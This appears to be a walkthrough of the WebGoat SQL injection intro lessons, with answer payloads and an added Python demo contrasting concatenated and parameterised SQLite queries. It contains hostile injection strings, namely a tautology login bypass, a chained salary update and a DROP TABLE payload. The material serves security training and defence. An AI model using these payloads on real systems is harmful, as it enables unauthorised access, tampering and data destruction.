# 2. (A1) Injection - SQL Injection (intro)

###### tags: `webgoat題目`

## 2 What is SQL?

:::success
select department from employees where first_name = 'Bob'
:::

## 3 Data Manipulation Language (DML)

:::success
update employees set department = 'Sales' where userid = 89762
:::

## 4 Data Definition Language (DDL)

:::success
alter table employees add phone varchar(20);
:::

## 5 Data Control Language (DCL)

:::success
GRANT ALL PRIVILEGES ON grant_rights TO unauthorized_user
:::

## 9 Try It! String SQL injection

:::success
![](https://i.imgur.com/xr8mS5T.png)
:::

## 10 Try It! Numeric SQL injection

:::success
![](https://i.imgur.com/fxcFa8D.png)
:::

## 11 Compromising confidentiality with String SQL injection

:::success
Employee Name: `' or '1'='1`

Authentication TAN: `' or '1'='1`

![](https://i.imgur.com/ESqbhmR.png)
:::

## 12 Compromising Integrity with Query chaining

:::success
Original:

![](https://i.imgur.com/j67tMK3.png)

Authentication TAN: `' or '1'='1';update employees set SALARY = 90000 where userid = 37648;--`

![](https://i.imgur.com/Cq9BCer.png)

Authentication TAN: `' or '1'='1';update employees set SALARY = 90000 where userid = 37648;select * from employees;--`

![](https://i.imgur.com/OitHxeq.png)
:::

## 13 Compromising Availability

:::success
`1';drop table access_log;--`
:::
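To see why the payloads in lessons 10 to 12 work and what the fix looks like, here is an added example (not WebGoat's code) that rebuilds the lesson's `employees` table in an in-memory SQLite database with made-up rows and TAN values, then runs each payload through a concatenated query and through the same query with bound parameters. The `lookup_*` and `by_userid_*` function names and the sample rows are this example's own assumptions; the column names and payloads are taken from the lesson.

```python
import sqlite3

# Constructed sample data standing in for WebGoat's employees table; the column
# names follow the lesson's queries, the rows and TAN values are made up here.
EMPLOYEES = [
    (37648, "John", "Smith", "Sales", 50000, "tan-37648"),
    (89762, "Bob", "Franco", "Marketing", 60000, "tan-89762"),
    (12345, "Tobi", "Barnett", "Development", 70000, "tan-12345"),
]

# Payloads exactly as used in lessons 11 and 12 of this note.
STRING_PAYLOAD = "' or '1'='1"
CHAIN_PAYLOAD = "' or '1'='1';update employees set SALARY = 90000 where userid = 37648;--"


def make_db():
    """Build an in-memory SQLite database holding the constructed employees table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table employees (userid integer primary key, first_name text, "
        "last_name text, department text, salary integer, auth_tan text)"
    )
    conn.executemany("insert into employees values (?, ?, ?, ?, ?, ?)", EMPLOYEES)
    conn.commit()
    return conn


def lookup_vulnerable(conn, last_name, tan):
    """Lesson 11 pattern: user input is pasted straight into the SQL text, so the
    quote in the payload closes the literal and the rest becomes SQL syntax."""
    sql = ("select userid, last_name, salary from employees where last_name = '"
           + last_name + "' and auth_tan = '" + tan + "'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn, last_name, tan):
    """Same lookup with bound parameters: the input is passed as data and is
    compared literally, quotes and all, so the payload matches no row."""
    sql = ("select userid, last_name, salary from employees "
           "where last_name = ? and auth_tan = ?")
    return conn.execute(sql, (last_name, tan)).fetchall()


def by_userid_vulnerable(conn, userid_text):
    """Lesson 10 pattern: a numeric field concatenated without quotes, so no
    quote character is even needed to append 'or 1=1'."""
    sql = "select userid, last_name from employees where userid = " + userid_text
    return conn.execute(sql).fetchall()


def by_userid_safe(conn, userid_text):
    """Validate the type first, then bind: anything that is not an integer is
    rejected before it reaches the database."""
    userid = int(userid_text)  # raises ValueError for input such as "89762 or 1=1"
    sql = "select userid, last_name from employees where userid = ?"
    return conn.execute(sql, (userid,)).fetchall()


def salary_of(conn, userid):
    """Read back one salary so a test can check whether a chained UPDATE ran."""
    row = conn.execute("select salary from employees where userid = ?", (userid,)).fetchone()
    return row[0]


def chained_update_attempt(conn, lookup):
    """Feed the lesson-12 chaining payload to a lookup function and return the
    salary of userid 37648 afterwards. Python's sqlite3 execute() happens to
    refuse strings holding more than one statement, so it raises rather than
    running the UPDATE; that is a quirk of this driver, not a defence, since
    other drivers (and sqlite3's own executescript()) would run the chain."""
    try:
        lookup(conn, "Smith", CHAIN_PAYLOAD)
    except sqlite3.ProgrammingError:
        pass
    return salary_of(conn, 37648)
```

With the concatenated lookup, `' or '1'='1` in both fields returns every employee (the TAN check is short-circuited by the trailing `or '1'='1'`), and `89762 or 1=1` in the numeric field does the same without needing a quote; the parameterised versions return nothing for the string payload and reject the numeric one outright. For the chained payload the only reliable defence is the bound-parameter path, which leaves the salary untouched regardless of driver behaviour.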